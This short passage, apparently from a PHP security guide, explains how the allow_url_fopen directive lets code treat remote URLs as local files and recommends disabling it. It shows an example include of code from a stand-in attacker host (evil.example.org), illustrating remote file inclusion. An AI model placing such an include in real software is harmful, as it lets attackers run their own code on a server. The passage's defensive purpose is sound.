As illustrated in Chapter 6, the allow_url_fopen directive allows you to reference remote resources as if they are local files:
<?php $contents = file_get_contents('http://example.org/xss.html'); ?>
Chapter 5 reveals how dangerous this is when combined with the use of include or require:
<?php include 'http://evil.example.org/evil.inc'; ?>
I recommend disabling allow_url_fopen unless your application requires it.